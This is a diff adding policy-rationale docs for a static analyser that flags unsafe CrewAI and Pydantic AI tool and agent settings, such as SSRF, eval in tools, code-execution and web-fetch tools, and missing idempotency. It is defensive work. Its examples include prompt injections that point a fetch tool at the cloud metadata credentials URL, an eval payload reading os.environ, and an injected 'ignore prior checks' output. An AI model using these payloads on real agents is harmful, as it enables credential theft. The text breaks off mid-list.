Keep shell logic out of any agent-callable tool, and log every spawned + command with the session ID for audit. diff --git a/docs/Policy/crewai/ssrf.md b/docs/Policy/crewai/ssrf.md new file mode 100644 index 0000000..5be38b1 --- /dev/null +++ b/docs/Policy/crewai/ssrf.md @@ -0,0 +1,136 @@ +--- +policy_id: crewai_ssrf +category: crewai +topic: ssrf +rules: + - id: CREW-005 + severity: high + confidence: 0.8 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: CrewAI SSRF Safety + +**Policy ID:** `crewai_ssrf` +**File:** `crewai/ssrf.yaml` +**Rules:** CREW-005 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +CrewAI `@tool`-decorated function bodies that issue an outbound HTTP request to a +non-literal URL. The detection is the `has_dynamic_url_call` predicate: a request +call (`requests.*`, `httpx.*`, `urllib`, an aiohttp session, …) whose URL +argument is built from a parameter, an f-string, or a concatenation rather than a +fixed string literal. A request to a hard-coded constant URL does not fire. + +This rule covers SSRF reached by *hand-rolled* fetches inside a tool body. The +model-chosen URLs of CrewAI's built-in scraper / RAG tools are a separate +agent-scope concern (CREW-107, dangerous_tools.md). + +--- + +## Why SSRF is a distinct concern in CrewAI tools + +When the request URL is a literal, the developer chose the destination. When it +is built from a tool argument, the *model* chooses the destination at call time — +and in a CrewAI agent the model's choices are reachable by prompt injection. A +server-side request originates from inside the agent's network, so it can reach +things an external caller cannot: internal services on private CIDRs, localhost +admin ports, and the cloud metadata endpoint (169.254.169.254) that hands out +short-lived IAM credentials. 
A single injected instruction that redirects the +fetch to the metadata endpoint exfiltrates those credentials through the model's +next output. + +There is a second-order hazard specific to agents: whatever the tool fetches +re-enters the conversation as text the model reads, so an attacker who controls +the fetched page controls a fresh prompt-injection channel into the agent. The +SSRF primitive is therefore both an outbound credential-theft path and an inbound +injection path at once — which is why a model-controlled request target is +excessive agency (LLM06) even when the developer never intended the tool to reach +internal hosts. + +--- + +## Rule-by-rule defense + +### CREW-005 — Tool fetches a caller-controlled URL (Severity: high, Confidence: 0.8, Fix type: code) + +**What we detect:** a CrewAI `@tool` body that issues an HTTP request whose URL +is non-literal — built from a parameter or interpolated value (predicate +`has_dynamic_url_call`). + +**Why it is flaggable:** a model-controlled request target lets a prompt +injection point the request at internal services or the metadata endpoint, and +feeds the response back into the conversation as untrusted text. + +**Real-world consequence:** a `fetch_url(url)` tool calling `requests.get(url)` is +injected with `url="http://169.254.169.254/latest/meta-data/iam/security-credentials/role"`; +the returned credentials are exfiltrated through the model's next reply. + +**Why severity is high and not critical:** SSRF is serious but its blast radius +depends on the host's network position (a host with no reachable internal +services or metadata endpoint exposes far less); it is not the unconditional code +execution the engine reserves critical for. **Fix type — code:** constraining or +hard-coding the destination is an edit to the tool body.
**Confidence 0.8:** the +predicate flags a non-literal URL, so it over-fires when the dynamic part is +already validated against an allow-list inside the body (the rule cannot see the +guard), and it under-fires when the URL is assembled in a helper in another +module. + +--- + +## What this policy does not cover + +- The model-chosen URLs of CrewAI's built-in scraper / search / RAG tools — those + are flagged at agent scope by **CREW-107** (dangerous_tools.md). +- A request whose URL is dynamic but already validated against an allow-list + inside the tool body — the rule cannot see the guard, so it fires anyway (a + known false positive). +- A fetch assembled in a helper in another module — the body-only walk misses it. +- DNS-rebinding and time-of-check/time-of-use attacks against an allow-list that + validates the hostname but not the resolved IP. Defeating those requires + re-checking the resolved address, which is beyond what this rule asserts. +- Exfiltration or internal access through non-HTTP primitives (raw sockets, DNS, + SMTP) belongs to other concerns. + +--- + +## Recommendations beyond the fix + +```python +from crewai.tools import tool +import ipaddress, socket +from urllib.parse import urlparse +import requests + +ALLOWED_HOSTS = {"api.example.com"} + +@tool("get_status") +def get_status(path: str) -> str: + """Fetch a status path from the vetted API host only.""" + url = f"https://api.example.com/{path.lstrip('/')}" # host is fixed + host = urlparse(url).hostname + if host not in ALLOWED_HOSTS: + return "error: host not allowed" + ip = ipaddress.ip_address(socket.gethostbyname(host)) + if ip.is_private or ip.is_loopback or ip.is_link_local: + return "error: resolves to a non-public address" + return requests.get(url, timeout=10).text +``` + +1. If the tool only ever talks to one service, hard-code the base URL and accept + only a path or query from the model — never a full URL. +2. 
When a host must be dynamic, validate it against an allow-list, resolve the + hostname, and re-check the resolved IP against private / loopback / link-local + ranges — then connect to that vetted IP, because a client that re-resolves the hostname reopens the DNS-rebinding window. +3. Disable or constrain redirect following so a 302 cannot bounce the request + into an internal address. +4. Always pass `timeout=`, and treat the fetched body as untrusted — keep it out + of the system prompt and do not let it expand the agent's permissions. diff --git a/docs/Policy/crewai/tool_behavior.md b/docs/Policy/crewai/tool_behavior.md new file mode 100644 index 0000000..6d4405a --- /dev/null +++ b/docs/Policy/crewai/tool_behavior.md @@ -0,0 +1,116 @@ +--- +policy_id: crewai_tool_behavior +category: crewai +topic: tool_behavior +rules: + - id: CREW-108 + severity: medium + confidence: 0.6 + scope: tool + fix_type: config +references: [LLM05] +--- + +# Policy Rationale: CrewAI Tool Behavior Safety + +**Policy ID:** `crewai_tool_behavior` +**File:** `crewai/tool_behavior.yaml` +**Rules:** CREW-108 +**Severities:** medium +**Fix types:** config +**References:** LLM05 (Improper Output Handling) + +--- + +## What this policy covers + +CrewAI tools that alter the agent's control flow by returning their output as the +final answer. **CREW-108** fires when a `@tool` is configured with +`result_as_answer=True` (predicate `tool_decorator_kwarg_value` matching the +literal `True`). The rule reads the decorator argument, not the tool body. + +--- + +## Why short-circuiting the agent is a distinct concern in CrewAI + +Normally the model reviews a tool's output before deciding what to do with it: it +can validate, summarize, reject, or combine it with other context. Setting +`result_as_answer=True` removes that step entirely — CrewAI takes the tool's raw +output as the agent's final answer and stops. No model reasoning runs after the +tool, no post-tool validation step executes, and nothing sanitizes the result +before it reaches the caller.
When the tool returns content that is influenced by +the model or an attacker — a scraped page, a file read, a search result — that +unvalidated, possibly-injected content flows straight to whoever consumes the +agent's answer. This is the CrewAI analog of LangChain's `return_direct`: +convenient for a deterministic passthrough whose output is already trusted, +dangerous the moment the tool's output is not. It is an Improper Output Handling +(LLM05) problem — the agent emits a tool result as authoritative without the +validation layer that would normally stand between the tool and the caller. + +--- + +## Rule-by-rule defense + +### CREW-108 — Tool returns its output as the final answer (Severity: medium, Confidence: 0.6, Fix type: config) + +**What we detect:** a `@tool` decorated with `result_as_answer=True` (predicate +`tool_decorator_kwarg_value`). + +**Why it is flaggable:** the flag short-circuits the agent so the tool's raw +output becomes the final answer with no model review or post-tool validation. If +that output is model- or attacker-influenced, unvalidated content reaches the +caller. + +**Real-world consequence:** a `fetch_page` tool with `result_as_answer=True` is +pointed by a prompt injection at an attacker page; the page's contents — including +any injected instructions or misinformation — are returned to the user verbatim +as the agent's answer, with the model never given a chance to flag them. + +**Why severity is medium and not high:** the flag is dangerous only when the +tool's output is untrusted; with a tool whose output is already trusted and +sanitized it is a legitimate, safe optimization, so the impact is conditional +rather than inherent. **Fix type — config:** the fix is flipping a decorator +keyword, no tool-body change. 
**Confidence 0.6:** the rule cannot tell whether +the tool's output is trusted, so it fires on every `result_as_answer=True` +including the many deliberate, safe uses — the largest source of false positives, +which is why confidence sits at 0.6. + +--- + +## What this policy does not cover + +- Whether the tool's output is actually trusted. The rule flags the + control-flow flag, not the trust level of what flows through it, so a + deterministic passthrough of safe data fires (a deliberate false positive). +- The same short-circuit reached by other means — a tool that simply *is* the + last call the model makes achieves a similar effect without the flag and is not + matched. +- Whether the tool body sanitizes its own output before returning. A tool that + cleans its result internally still fires on the flag. +- `result_as_answer` set to a non-literal (a variable resolved at runtime) may + not match the literal-value predicate. + +--- + +## Recommendations beyond the fix + +```python +from crewai.tools import tool + +# Default (result_as_answer omitted / False): the model reviews the output. +@tool("fetch_summary") +def fetch_summary(doc_id: str) -> str: + """Return the stored summary for a document. Output is reviewed by the + agent before it becomes the final answer.""" + return load_trusted_summary(doc_id) +``` + +1. Leave `result_as_answer` at its default (`False`) unless you specifically + intend to short-circuit the agent with a tool whose output is already trusted + and sanitized. +2. If you do use it, shape and sanitize the tool's output inside the tool body — + no model step or guardrail runs after it, so the body is the last line of + defense. +3. Never combine `result_as_answer=True` with a tool that fetches external + content, reads arbitrary files, or otherwise returns model-/attacker- + influenced data. 
diff --git a/docs/Policy/crewai/tool_definition.md b/docs/Policy/crewai/tool_definition.md new file mode 100644 index 0000000..24c9ae0 --- /dev/null +++ b/docs/Policy/crewai/tool_definition.md @@ -0,0 +1,145 @@ +--- +policy_id: crewai_tool_definition +category: crewai +topic: tool_definition +rules: + - id: CREW-001 + severity: low + confidence: 0.9 + scope: tool + fix_type: code + - id: CREW-002 + severity: medium + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: CrewAI Tool Definition Hygiene + +**Policy ID:** `crewai_tool_definition` +**File:** `crewai/tool_definition.yaml` +**Rules:** CREW-001, CREW-002 +**Severities:** low, medium +**Fix types:** code, code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Authoring hygiene for CrewAI tools defined with the `@tool` decorator from +`crewai.tools`. **CREW-001** fires when the decorated function has no docstring +(predicate `has_docstring: false`). **CREW-002** fires when the function takes +parameters but none carry type annotations (predicates `has_params: true` AND +`has_typed_params: false`). Both read the function signature CrewAI turns into +what the model sees: the docstring becomes the tool's description, the type hints +become its argument schema. + +--- + +## Why definition quality is a distinct concern in CrewAI tools + +The model never sees a CrewAI tool's implementation — it sees only the +description and argument schema CrewAI derives from the function. The model +selects which tool to call and what arguments to pass entirely from that derived +surface. A tool with no docstring reaches the model as a bare name: it cannot +tell what the tool does or when to call it, so it skips the tool or invokes it +with the wrong arguments. 
A tool with untyped parameters produces an +underspecified schema: the model gets no type guidance, emits arguments of the +wrong shape, and Pydantic rejects them at validation time — a silent reliability +tax on every call. There is an excessive-agency edge too (LLM06): an +underspecified schema widens the tool's input surface, so wrong-shaped +model-supplied values that slip past validation reach the tool body in shapes the author +never anticipated. The gap is not a remote-execution hole but a degradation of +the contract the model routes against, and it compounds on a retrying agent that +burns turns re-issuing mis-shaped calls. + +--- + +## Rule-by-rule defense + +### CREW-001 — Tool has no description (Severity: low, Confidence: 0.9, Fix type: code) + +**What we detect:** a `@tool`-decorated function with no docstring (predicate +`has_docstring`). + +**Why it is flaggable:** CrewAI passes the docstring to the model verbatim as the +tool's description; with none, the tool is a bare name the model cannot reason +about. + +**Real-world consequence:** a `lookup` tool with no docstring is never selected +when the user asks a question it could have answered, or is called with a +nonsense argument because the model is guessing at its purpose. + +**Why severity is low and not medium:** it is a routing-quality defect with no +direct security impact, and the failure mode (a skipped or mis-called tool) is +visible and recoverable rather than silent. **Fix type — code:** adding a +docstring is a tool-source edit. **Confidence 0.9:** docstring presence is +unambiguous; the small gap covers a tool whose description is supplied another +way the predicate does not model. + +### CREW-002 — Tool parameters are not type-annotated (Severity: medium, Confidence: 0.85, Fix type: code) + +**What we detect:** a `@tool` function that has parameters but no type +annotations on any of them (predicates `has_params` + `not has_typed_params`).
+ +**Why it is flaggable:** CrewAI builds the argument schema from the type hints; +without them the model gets no shape guidance and emits wrongly-typed arguments +that fail validation. + +**Real-world consequence:** a `create_invoice(amount, customer)` tool with +untyped params lets the model pass `amount="twelve dollars"`; Pydantic rejects +it, the call retries, and turns are wasted before it succeeds — or it silently +coerces to the wrong value. + +**Why severity is medium and not low:** unlike a missing description, a +mis-shaped argument can reach the tool body with the wrong value and cause an +incorrect side effect, not just a skipped call — so the impact is higher than +CREW-001. **Fix type — code:** annotating parameters is a source edit. +**Confidence 0.85:** the rule fires only when *no* parameter is typed, so a +partially-typed tool is a false negative; and a tool that documents shapes in the +docstring but omits annotations still fires. + +--- + +## What this policy does not cover + +- A *partially* typed tool (some parameters annotated, some not) does not fire — + CREW-002 requires that no parameter carries a type. +- The *quality* of a docstring or a type: a one-word docstring or an overly broad + `dict` annotation satisfies the rules but barely helps the model. +- Tools whose description is supplied through a mechanism other than the + function docstring. +- Whether the schema the model sees actually matches the tool's real behavior — + a misleading-but-present docstring passes. + +--- + +## Recommendations beyond the fix + +```python +from crewai.tools import tool + +@tool("create_invoice") +def create_invoice(amount_cents: int, customer_id: str) -> str: + """Create a draft invoice for a customer. + + Args: + amount_cents: Invoice total in integer cents (e.g. 1299 for $12.99). + customer_id: The customer's opaque ID, e.g. "cus_abc123". + Returns: the new invoice ID. + """ + ... +``` + +1.
Write the docstring for the model, not a human maintainer: state what the + tool does, the exact inputs it expects, and what it returns. +2. Annotate every parameter with a concrete type (`int`, `list[str]`, a Pydantic + model) — prefer precise types (`amount_cents: int`) over loose ones + (`amount`). +3. Use an `Enum` or `Literal` for closed-set arguments so the model cannot emit + an out-of-range value. +4. Keep the description and the implementation in sync — a docstring that + overstates what the tool does is its own correctness hazard. diff --git a/docs/Policy/pydantic_ai/agent_safety.md b/docs/Policy/pydantic_ai/agent_safety.md new file mode 100644 index 0000000..521efe9 --- /dev/null +++ b/docs/Policy/pydantic_ai/agent_safety.md @@ -0,0 +1,226 @@ +--- +policy_id: pydantic_ai_agent_safety +category: pydantic_ai +topic: agent_safety +rules: + - id: PYD-101 + severity: low + confidence: 0.7 + scope: agent + fix_type: config + - id: PYD-102 + severity: high + confidence: 0.85 + scope: agent + fix_type: config + - id: PYD-103 + severity: medium + confidence: 0.75 + scope: agent + fix_type: config + - id: PYD-105 + severity: low + confidence: 0.7 + scope: agent + fix_type: config +references: [LLM05, LLM06, LLM10] +--- + +# Policy Rationale: Pydantic AI Agent Safety + +**Policy ID:** `pydantic_ai_agent_safety` +**File:** `pydantic_ai/agent_safety.yaml` +**Rules:** PYD-101, PYD-102, PYD-103, PYD-105 +**Severities:** low, high, medium, low +**Fix types:** config, config, config, config +**References:** LLM05 (Improper Output Handling), LLM06 (Excessive Agency), LLM10 (Unbounded Consumption) + +--- + +## What this policy covers + +Agent-scope rules for the Pydantic AI `Agent(...)` constructor (normalized +`pydantic_ai_agent`). **PYD-101** fires when the agent has no validated output +type — `output_type` is absent (defaulting to `str`) or set explicitly to `str` +(predicate: `agent_kwarg_missing` OR `agent_kwarg_value` matching `str`). 
+**PYD-102** fires when the agent wires `CodeExecutionTool` (predicate +`agent_uses_hosted_tool_class`). **PYD-103** fires when the agent wires a native +URL fetcher — `WebFetchTool` or `UrlContextTool` (same predicate). **PYD-105** +fires when `end_strategy="exhaustive"` (predicate `agent_kwarg_value`). + +--- + +## Why agent configuration is a distinct concern in Pydantic AI + +Pydantic AI's defining feature is that `output_type` can be a Pydantic model the +framework validates and, on failure, re-prompts the model to correct — turning +model output into a typed contract. PYD-101 flags agents that forfeit that: with +`output_type` absent or `str`, the agent returns whatever text the model produced, +so downstream code parses unvalidated strings and a prompt injection or confused +model can return malformed or unexpected content consumed as if it were trusted. +That is the Improper Output Handling (LLM05) angle — the validation layer the +framework offers is simply switched off. + +The two highest-risk kwargs wire native capabilities directly onto the agent. +`CodeExecutionTool` (PYD-102) is a provider-native tool that runs code the model +generates; once it is in the tool set a prompt injection has a direct path to +arbitrary code execution in the provider's execution environment — excessive +agency (LLM06). The native URL fetchers (PYD-103) retrieve model-chosen URLs, an +SSRF surface into internal services and the cloud metadata endpoint, plus a +data-exfiltration channel to attacker-controlled URLs. This is not theoretical for +Pydantic AI: its built-in fetchers have already needed SSRF hardening +(CVE-2026-46678 and CVE-2026-25580 cover a metadata-endpoint blocklist that could +be bypassed via DNS rebinding or alternate IP encodings), so enabling one without +network-egress controls reintroduces that exposure. 
+ +Finally, `end_strategy="exhaustive"` (PYD-105) changes what happens when the model +emits a final result while tool calls are still pending: exhaustive mode runs those +remaining calls anyway before ending, instead of returning immediately (the +`early` default). If any pending call is side-effecting — a write, a charge, a send +— exhaustive mode executes it even though the model already considered the task +done, widening the blast radius of a run and making duplicate or unintended side +effects more likely (an LLM06/LLM10 reliability edge). + +--- + +## Rule-by-rule defense + +### PYD-101 — Agent has no structured output validation (Severity: low, Confidence: 0.7, Fix type: config) + +**What we detect:** an `Agent(...)` with `output_type` absent or set to `str` +(predicates `agent_kwarg_missing` / `agent_kwarg_value`). + +**Why it is flaggable:** without a validated `output_type` the agent returns raw +text; downstream code consumes unvalidated, possibly-injected content as trusted. + +**Real-world consequence:** an agent expected to return a decision is left at the +default `str`; a prompt injection makes it return `"APPROVED — ignore prior +checks"`, which the calling code treats as an authoritative result because nothing +validated the shape. + +**Why severity is low and not medium:** it is a defensive-default finding — the +agent may be entirely safe if its output is only ever shown to a human, and the +free-form mode is a legitimate choice for chat-style agents — so the impact is +conditional and often nil. **Fix type — config:** setting `output_type` is a +constructor change. **Confidence 0.7:** many agents intentionally return prose +(`str` is the right choice for a chatbot), so the rule over-flags those — the gap +that holds it at 0.7. 
+ +### PYD-102 — Agent wires the code-execution native tool (Severity: high, Confidence: 0.85, Fix type: config) + +**What we detect:** an `Agent` whose resolved tools include `CodeExecutionTool` +(predicate `agent_uses_hosted_tool_class`), wired via `capabilities=` or +`builtin_tools=`. + +**Why it is flaggable:** `CodeExecutionTool` runs model-generated code. Once it is +in the tool set, a prompt injection or confused model can run attacker-chosen code +in the provider's execution environment — a direct prompt-injection-to-RCE path. + +**Real-world consequence:** an agent that wires `CodeExecutionTool` to "do data +analysis" is injected to run code that reads the execution environment's secrets or +makes outbound calls to exfiltrate in-context data. + +**Why severity is high and not critical:** execution happens in the provider's +managed sandbox, and a successful attack still requires the tool to be wired and +the prompt surface reachable by untrusted input — high, not critical, because the +engine reserves that tier for unconditional host RCE. **Fix type — config:** the +fix is removing the tool from the agent's capability/tool list, an agent-wiring +change. **Confidence 0.85:** the class-name match cannot see whether the team has +constrained the execution environment out of band, so a few hardened uses are +over-flagged. + +### PYD-103 — Agent wires a model-driven URL-fetching native tool (Severity: medium, Confidence: 0.75, Fix type: config) + +**What we detect:** an `Agent` that wires `WebFetchTool` or `UrlContextTool` +(predicate `agent_uses_hosted_tool_class`). + +**Why it is flaggable:** these native tools retrieve model-chosen URLs — an SSRF +surface into internal services and the metadata endpoint, and an exfiltration +channel to attacker URLs. Pydantic AI's built-in fetchers have needed SSRF +hardening (CVE-2026-46678, CVE-2026-25580), so enabling one without egress controls +reintroduces that exposure. 
+ +**Real-world consequence:** an agent with `WebFetchTool` is injected to fetch +`http://169.254.169.254/latest/meta-data/iam/security-credentials/`, and the +returned cloud credentials are exfiltrated through the model's next output. + +**Why severity is medium and not high:** the impact depends on the agent host's +network position (no reachable internal services or metadata endpoint, or an egress +proxy, shrinks it sharply), and the SDK's own fetchers now ship a metadata +blocklist that blunts the most direct attack — so the residual risk is real but +conditional. **Fix type — config:** drop or constrain the native fetcher and add +egress controls — no tool source edit. **Confidence 0.75:** the rule flags the +tool's presence, not a proven reachable internal target, so it over-flags agents +that only ever fetch vetted external URLs or run behind a strict egress allow-list. + +### PYD-105 — Agent retries with the exhaustive end strategy (Severity: low, Confidence: 0.7, Fix type: config) + +**What we detect:** an `Agent` with `end_strategy="exhaustive"` (predicate +`agent_kwarg_value`). + +**Why it is flaggable:** exhaustive mode runs still-pending tool calls after the +model has produced a final result; if any pending call is side-effecting, it fires +even though the task was already considered done. + +**Real-world consequence:** the model returns a final answer with a pending +`send_email` tool call still queued; exhaustive mode sends the email anyway, an +unintended side effect the `early` default would have skipped. + +**Why severity is low and not medium:** it only matters when pending calls are +side-effecting *and* the model finishes with calls still queued — a narrow +intersection, and harmless when every callable tool is side-effect-free. **Fix +type — config:** the fix is leaving `end_strategy` at its `early` default, a +constructor change. 
**Confidence 0.7:** the rule cannot tell whether the agent's +tools have side effects, so it over-flags exhaustive-mode agents whose tools are +all read-only. + +--- + +## What this policy does not cover + +- Code execution implemented by hand inside a tool body rather than via + `CodeExecutionTool` — caught by **PYD-004** (code_execution.md), not here. +- Hand-rolled URL fetches inside a tool body — caught by **PYD-005** (ssrf.md); + PYD-103 covers only the native fetcher tools. +- Whether the agent's prompt surface is actually reachable by untrusted content — + all four rules flag a configuration, not a proven injection path. +- PYD-101 cannot tell whether a `str` output is consumed by code (risky) or only + shown to a human (safe); PYD-105 cannot tell whether pending tools have side + effects. +- A native tool referenced under an alias, or a provider tool outside the listed + class set, may escape the class-name match. Whether a native tool's execution or + fetch environment is sandboxed is not visible to the match. + +--- + +## Recommendations beyond the fix + +```python +from pydantic import BaseModel +from pydantic_ai import Agent + +class Decision(BaseModel): + approved: bool + reason: str + +# Validated output; no code-execution or open-fetch native tools; early end. +agent = Agent( + "openai:gpt-4o", + output_type=Decision, # framework validates & re-prompts on failure + end_strategy="early", # skip pending tool calls once a result is final + tools=[vetted_lookup], # no CodeExecutionTool / WebFetchTool +) +``` + +1. Set `output_type` to a Pydantic model (or a typed union) wherever the result is + consumed by code, so callers receive a checked object and the framework + re-prompts on a validation failure. +2. Remove `CodeExecutionTool` from production agents; if code execution is genuinely + needed, run it in a hardened external sandbox gated behind explicit human + approval. +3. 
Enable a native URL fetcher only when open web access is truly required, and put + egress controls around the agent process: a host allow-list, blocked + private/link-local ranges, and a proxy that rejects internal addresses. Prefer a + purpose-built fetcher over an open one. +4. Leave `end_strategy` at `early` unless every callable tool is side-effect-free + and you specifically need the remaining calls to complete. diff --git a/docs/Policy/pydantic_ai/code_execution.md b/docs/Policy/pydantic_ai/code_execution.md new file mode 100644 index 0000000..9d80b4a --- /dev/null +++ b/docs/Policy/pydantic_ai/code_execution.md @@ -0,0 +1,121 @@ +--- +policy_id: pydantic_ai_code_execution +category: pydantic_ai +topic: code_execution +rules: + - id: PYD-004 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Pydantic AI Code-Execution Safety + +**Policy ID:** `pydantic_ai_code_execution` +**File:** `pydantic_ai/code_execution.yaml` +**Rules:** PYD-004 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Pydantic AI tools whose body evaluates code at runtime. **PYD-004** fires when a +tool function (defined via `@agent.tool` / `@agent.tool_plain` or the `Tool(...)` +factory) calls the bare `eval`, `exec`, or `compile` builtin (predicate +`has_code_exec_call`, a bare-builtin AST match — `re.compile` and other attribute +calls do not fire). + +--- + +## Why dynamic code execution is a distinct concern in Pydantic AI tools + +A Pydantic AI tool is exposed to the model, so the model writes or steers any +string the tool evaluates. With any model-influenced input, `eval`/`exec`/`compile` +is arbitrary code execution inside the agent process — no OS sandbox stands between +the call and the runtime's imports, file handles, and in-memory credentials. 
The +blast radius is the whole process: one evaluated string can read `os.environ`, +touch any file the process can reach, or spawn a subprocess. + +The Pydantic-AI-specific sharpening: this is the same arbitrary-execution +capability as the framework's built-in `CodeExecutionTool` (PYD-102), hand-rolled +inside a tool body — and it bypasses whatever sandboxing the native tool would have +applied. The native tool runs code in a provider-managed environment; an +in-process `eval` runs it directly in the agent's own Python, with full access to +the host application's process. So reaching for `eval` for convenience inside a +`@agent.tool` is strictly more exposed than using the native tool it imitates. + +--- + +## Rule-by-rule defense + +### PYD-004 — Tool body evaluates dynamic code (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** a Pydantic AI tool whose body calls the bare `eval`, `exec`, +or `compile` builtin (predicate `has_code_exec_call`, an AST callee match, not a +substring scan). + +**Why it is flaggable:** dynamic evaluation in a model-callable tool is an +arbitrary-code-execution surface whenever any part of the evaluated string +originates with the model. The presence of the primitive is the signal. + +**Real-world consequence:** a `calculate(expr)` tool implemented as +`return eval(expr)` is driven by an injected instruction into +`__import__('os').environ` to read secrets, or into reading/writing files the +process can touch. + +**Why severity is high and not critical:** no in-band sandbox stands between the +call and the full runtime, so the only reliable fix is removing dynamic +evaluation; it is not raised to critical because the engine reserves that tier and +the exposure depends on whether the evaluated string is actually model-influenced. +**Fix type — code:** removing `eval`/`exec`/`compile` is a tool-source edit. 
+**Confidence 0.85:** the bare-callee match avoids the `re.compile` false positive, +but a dynamic-eval helper in another module, or evaluation via +`types.FunctionType` / `marshal` / `pickle.loads`, escapes the body-only walk. + +--- + +## What this policy does not cover + +- The native `CodeExecutionTool` wired on the agent — that is the agent-scope + concern of **PYD-102** (agent_safety.md), not a tool rule. +- Dynamic evaluation reached through a helper in another module — the walk sees + only the tool body. +- Alternative dynamic-code primitives: `types.FunctionType`, `marshal.loads`, + `pickle.loads`, `importlib`-driven loading. +- Evaluations whose argument is provably a constant literal still fire — the + predicate flags the presence of the primitive, not proof of model-control. + +--- + +## Recommendations beyond the fix + +```python +import ast +from pydantic_ai import Agent, RunContext + +agent = Agent("openai:gpt-4o") + +@agent.tool_plain +def calculate(expr: str) -> str: + """Evaluate a constant arithmetic expression; runs no arbitrary code.""" + node = ast.parse(expr, mode="eval") + allowed = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant, + ast.operator, ast.unaryop) + if not all(isinstance(n, allowed) for n in ast.walk(node)): + return "error: disallowed syntax" + return str(eval(compile(node, "", "eval"))) # literals only +``` + +1. Remove `eval`/`exec`/`compile` from agent-callable tool bodies. To parse literal data + prefer `ast.literal_eval`; reserve a constrained AST walk for arithmetic — and note that the example above still calls `eval`/`compile` on the vetted tree, so PYD-004 flags it. +2. If running code is genuinely the product, isolate it in a locked-down sandbox + (no filesystem or network, hard timeout) — or use the native `CodeExecutionTool` + under explicit human approval — rather than in-process evaluation. +3. Parse structured input with a typed Pydantic schema rather than evaluating it. +4. Keep application secrets out of the process that hosts any evaluation-capable + tool, and log every evaluation with the session ID.
diff --git a/docs/Policy/pydantic_ai/idempotency.md b/docs/Policy/pydantic_ai/idempotency.md new file mode 100644 index 0000000..2b687e6 --- /dev/null +++ b/docs/Policy/pydantic_ai/idempotency.md @@ -0,0 +1,129 @@ +--- +policy_id: pydantic_ai_idempotency +category: pydantic_ai +topic: idempotency +rules: + - id: PYD-007 + severity: medium + confidence: 0.55 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Pydantic AI Mutating-Tool Idempotency + +**Policy ID:** `pydantic_ai_idempotency` +**File:** `pydantic_ai/idempotency.yaml` +**Rules:** PYD-007 +**Severities:** medium +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Pydantic AI tools whose name implies a side effect but which take no idempotency +key. **PYD-007** fires when a tool function's name starts with one of `create_`, +`send_`, `delete_`, `post_`, `update_`, `refund_`, `charge_`, `issue_` (predicate +`name_has_prefix`) AND no parameter name contains `idempot` or is exactly +`request_id` / `txn_id` (predicate `param_name_matches`, negated). It is a +name-and-signature heuristic — it does not read the tool body. + +--- + +## Why missing idempotency is a distinct concern in Pydantic AI tools + +A mutating tool that runs twice does its side effect twice: a duplicate charge, a +double-sent message, a repeated delete. In ordinary code a developer controls how +often a function is called; in an agent the *framework* re-invokes tools. Pydantic +AI retries a tool call when the model's arguments fail validation, and the agent +loop can re-select the same tool across turns — so the same side-effecting action +can fire more than once without the author writing any retry logic. The classic +trigger is a timeout or a validation retry: the backend processed the request but +the response was lost or the arguments were re-validated, so the call repeats and +the action happens again. 
+ +An idempotency key closes this: the tool sends a stable key the backend uses to +recognize a retried request and return the original result instead of re-executing. +Without it, the agent's own retry behavior turns a transient failure into a +duplicated real-world effect — an excessive-agency (LLM06) reliability hazard where +the agent takes a consequential action more times than intended. The protection +only holds end to end if the downstream service also honors the key; the parameter +is necessary but not sufficient on its own. + +--- + +## Rule-by-rule defense + +### PYD-007 — Mutating tool has no idempotency key (Severity: medium, Confidence: 0.55, Fix type: code) + +**What we detect:** a tool whose name begins with a mutation prefix (`create_`, +`send_`, `refund_`, …) and which has no parameter named for an idempotency key +(`*idempot*`, `request_id`, or `txn_id`). + +**Why it is flaggable:** the name signals a side effect, and Pydantic AI's +validation-retry and re-selection behavior can fire that side effect twice; without +a key there is no mechanism for the backend to deduplicate. + +**Real-world consequence:** a `charge_card(customer, amount)` tool has its +arguments re-validated after a transient model error; Pydantic AI retries, and the +customer is charged twice with no key for the processor to collapse the duplicate. + +**Why severity is medium and not high:** the duplicate fires only on a retry path +(timeout, ambiguous failure, or a validation retry), not on every call, and many +backends are already idempotent for other reasons — so the impact is real but +probabilistic rather than guaranteed. **Fix type — code:** adding an +`idempotency_key` parameter and threading it to the API is a tool-source change. 
+**Confidence 0.55:** this is a name heuristic, so a tool named `update_cache` that +mutates nothing fires (false positive), a side-effecting tool named +`process_payment` without a mutation prefix does not (false negative), and a tool +that achieves idempotency through an unnamed mechanism is over-flagged — the low +number reflects all three gaps. + +--- + +## What this policy does not cover + +- Side-effecting tools whose name does not start with a listed prefix + (`process_`, `apply_`, `submit_`, `transfer_`) — they are false negatives. +- Tools that achieve idempotency without a matching parameter name — e.g. by + deriving a natural key inside the body, or because the backend dedupes on a + business field. The signature heuristic cannot see body logic, so these fire + anyway. +- Read-only tools that happen to match a prefix (`update_view_count` that only + reads) — a false positive. +- Whether the downstream service actually honors the key. The rule checks for a + parameter, not that retries are truly deduplicated end to end. + +--- + +## Recommendations beyond the fix + +```python +from pydantic_ai import Agent + +agent = Agent("openai:gpt-4o") + +@agent.tool_plain +def charge_card(customer_id: str, amount_cents: int, idempotency_key: str) -> str: + """Charge a customer. `idempotency_key` must be stable across retries so a + re-sent request is collapsed by the processor instead of charging twice.""" + return payments.charge( + customer=customer_id, + amount=amount_cents, + idempotency_key=idempotency_key, # backend dedupes on this + ) +``` + +1. Add an `idempotency_key: str` parameter to every mutating tool and pass it + through to the backing API so a retried call is recognized and deduplicated. +2. Make the key stable for a logical operation — derive it from the operation's + inputs (e.g. a hash of customer + amount + intent) so the same retried action + reuses the same key. +3. 
